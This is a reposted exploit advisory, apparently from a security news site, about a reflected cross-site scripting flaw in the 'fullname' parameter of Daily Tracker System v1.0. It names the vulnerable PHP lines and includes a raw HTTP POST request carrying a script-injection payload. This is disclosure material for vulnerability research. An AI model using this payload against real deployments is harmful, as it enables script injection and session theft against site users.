Daily Tracker System 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on August 1st, 2020 📆 | 7423 Views ⚑

0

Daily Tracker System 1.0 Cross Site Scripting ≈ Packet Storm

# Exploit Title: Daily Tracker System v1.0 – Reflected Cross Site Scripting
(XSS)
# Exploit Author: Adeeb Shah
# Date: July 30th, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link:
https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: v1.0
# Tested On: Windows 10 Pro (x64) + XAMPP

# Vulnerability Details:
# The value of the fullname request parameter is copied into the value of
an HTML tag attribute which is encapsulated in double quotation marks. The
payload rwsg6″>x88n2 was submitted in the fullname
parameter. This input was echoed unmodified in the application’s response.
This proof-of-concept attack demonstrates that it is possible to inject
arbitrary JavaScript into the application’s response.

# Vulnerable Source Code
# ./user-profile.php
# 11 $fullname=$_POST[‘fullname’];
# ./includes/sidebar.php
# 21

< ?php echo $name;
?>

# POST /dets/user-profile.php HTTP/1.1

Host: 172.16.65.130
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://172.16.65.130/dets/user-profile.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Cookie: PHPSESSID=atvmfd664osgggvtcoc4scv9vs

fullname=qdgxv9ny5y7prycziwy4tx92gz950m2ij88rwsg6%22%3e%3cscript%3ealert(1)%3c%2fscript%3ex88n2&email=
[email protected]
&contactnumber=289607&regdate=2020-07-29+20%3a04%3a07&submit=

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...